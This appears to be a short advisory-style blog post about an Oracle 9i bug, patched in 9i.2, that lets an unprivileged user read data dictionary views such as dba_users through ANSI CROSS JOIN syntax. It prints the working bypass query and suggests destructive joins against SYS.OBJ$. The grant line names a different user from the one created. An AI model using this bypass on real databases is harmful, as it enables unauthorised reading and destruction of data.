Security Hole


This one has been done to death on the newsgroup, but just in case you haven't seen it, there is a security hole in 9i when using the new ANSI join syntax. Consider the following example:

create user demo identified by demo;
grant create session To us1;

connect demo/demo

Now at this point, the DEMO user should only be able to query those tables accessible to PUBLIC. For example,

SQL> select * from dba_users;

select * from dba_users
              *
ERROR at line 1:
ORA-00942: table or view does not exist

But as soon as you add in the newly supported ANSI join syntax, privileges appear to be bypassed.

select a.*
from   dba_users a
cross join dual

(all rows appear)

Of more concern, is that (unrelated to this bug) some joins of course allow updates/deletes etc. So a carefully created join using the new syntax can be used to destroy all sorts of things. (A cross join to SYS.OBJ$ would be the obvious candidate to do maximum damage

This listed as bug 2121935 which is fxed in 9i.2 and also a patch (of the same number) is available for some platforms on 9.0.1.3